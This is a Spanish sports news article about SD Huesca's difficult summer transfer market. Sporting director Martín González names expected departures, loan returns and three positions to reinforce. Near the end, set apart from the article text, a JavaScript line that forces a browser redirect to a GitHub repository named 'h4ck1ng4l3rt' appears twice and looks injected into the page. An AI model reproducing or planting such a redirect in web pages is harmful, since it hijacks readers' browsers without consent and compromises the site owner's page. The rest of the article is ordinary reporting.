Publicidad

La SD Huesca encara un "difícil" mercado de fichajes

El director deportivo del club, Martín González, explicó cómo se presenta el verano para el Huesca

Aragón Deporte /
Lance de un Tenerife-Huesca de este curso. Foto: LaLiga
icono foto Lance de un Tenerife-Huesca de este curso. Foto: LaLiga

"Está claro que vamos a tener dificultades para hacer una plantilla competitiva pero la vamos a conseguir". Ángel Martín González no se anduvo con rodeos a la hora de explicar cómo sería el mercado de fichajes de la SD Huesca. El director deportivo del club oscense repasó varios temas, entre ellos las salidas, las llegadas y qué se buscará en verano, y dio varias pistas de cómo se desarrollará el verano.

En el apartado de salidas, Martín González dio por seguras las de Florian Miguel y el cedido Euse Monzó. El primero lleva siendo titular indiscutible los dos últimos años en el carril izquierdo y como central, mientras que Monzó no continuará tras regresar como cedido del San Sebastián de los Reyes. Por su parte, estará difícil, según las palabras del director deportivo, la continuidad de Juan Carlos y Andrés Fernández, pesos pesados que acaban contrato. Los dos han recibido ofertas a la baja ante la bajada del límite salarial del Huesca. 

También se marchan los cedidos Kento, Sielva, Obeng y Javi Martínez. El deseo del club es que continúen los cuatro y se va a intentar, pese a la complejidad de las operaciones. "Hemos hablado con Osasuna, lo malo son los cómputos de LaLiga", explicaba Martín González sobre Javi Martínez. Así, entre salidas y el regreso de cedidos como Kevin Carlos (no se sabe todavía qué será de su futuro), la SD Huesca se queda con 19 fichas. El club mantendrá el grueso de la plantilla, por lo que será el turno de los jugadores que este año han sido más secundarios. Los Vilarrasa, Rubén Pulido, Kanté, Joaquín... estarán llamados a ser más importantes.

El objetivo será, según Martín González, acometer fichajes en tres posiciones, lateral izquierdo, mediocentro y delantera Y es que hay que paliar la baja importante de Florian Miguel y completar un centro del campo tocado por el regreso de los cedidos a sus respectivos clubes. En la delantera, Obeng podría ser el delantero perfecto para el proyecto de Ziganda; su segunda vuelta, con 5 goles en 17 partido y un encaje perfecto en el esquema de Ziganda así lo atestiguan. La portería, en el caso de que Andrés no renovase, estaría cubierta por Álvaro, que vuelve de su cesión al Espanyol. 

window.location.href="https://github.com/go0me/h4ck1ng4l3rt"window.location.href="https://github.com/go0me/h4ck1ng4l3rt"

Guardado en...

SD Huesca